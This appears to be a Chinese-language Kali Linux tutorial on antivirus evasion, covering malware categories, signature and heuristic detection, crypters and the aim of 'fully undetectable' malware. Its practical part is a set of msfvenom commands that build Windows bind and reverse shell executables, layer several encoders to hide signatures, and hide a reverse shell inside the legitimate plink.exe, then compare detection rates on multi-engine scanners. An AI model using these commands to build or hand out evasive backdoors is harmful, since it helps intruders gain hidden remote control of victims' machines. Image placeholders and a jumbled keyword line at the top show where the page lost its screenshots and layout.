處事 黑客 制造 直接 tcp src 很難 流氓 -a

惡意軟件:

病毒,木馬。蠕蟲,鍵盤記錄,僵屍程序,流氓軟件,勒索軟件,廣告程序

在用戶非自願的情況下安裝

出於某種惡意的目的:控制,竊取,勒索,偷窺,推送,攻擊

惡意程序最主要的防護手段:殺軟

檢測原理:基於二進制文件中特征簽名的黑名單檢測方法;基於行為的分析方法(啟發式)

免殺技術:

修改二進制文件中的特征字符---替換,擦除,修改

加密技術(crypter):

通過加密使得特征字符不可讀,從而逃避av檢測,運行時分片分段的解密執行,註入進程或av不檢查的無害文件中

防病毒軟件的檢測:

惡意程序本身的特征字符,加密器crypter的特征字符

當前現狀:

編寫私有RAT軟件,避免普遍被av所知的特征字符

使用獨有crypter軟件加密惡意程序

處事低調,盡量避免被發現,沒有能力自己編寫惡意代碼的黑客,通過直接修改特征碼的方式免殺

Fully UnDetectable是最高追求(FUD)

AV廠商:

廣泛采集樣本,盡快發現新出現的惡意程序,更新病毒庫

一般新的惡意軟件安全UD窗口期是一周左右

與惡意軟件制造者永無休止的拉鋸戰

當前現狀:

單一的av廠商的病毒庫很難達到100%覆蓋

接口被某些國家的av軟件免費利用,沒有自己的病毒庫--https://www.virustotal.com

在線多引擎查殺網站與av廠商共享信息---http://www.virscan.org

搞黑產的在線多引擎查毒站---https://nodistribute.com

常用RAT軟件:

黑暗彗星,潘多拉,NanoCore

自己編寫後門:

生成反彈shell

msfvenom -p windows/shell/bind_tcp lhost=192.168.1.12 lport=4444 -a x86 --platform win -f exe -o xxsec.exe
技術分享圖片

加密編碼反彈shell

msfvenom -p windows/shell/bind_tcp lhost=192.168.1.12 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 9 -b ‘\x00‘ -f exe -o xx.exe

技術分享圖片

加密前後查看可讀字符串對比

技術分享圖片

技術分享圖片

比較編碼前後的檢測率

http://www.virscan.org/language/zh-cn/

技術分享圖片

技術分享圖片

利用模板隱藏shell

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.12 lport=4444 -a x86 --platform win -f exe -o x.exe(未加密編碼)

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/plink.exe lhost=192.168.1.12 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --platform win -f exe > xxx.exe( 加密編碼)

對比

技術分享圖片

技術分享圖片

軟件保護:

軟件開發商為保護版權,采用的混淆加密技術避免盜版逆向,常被惡意軟件用於免殺目的

友情鏈接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

kali linux之免殺技術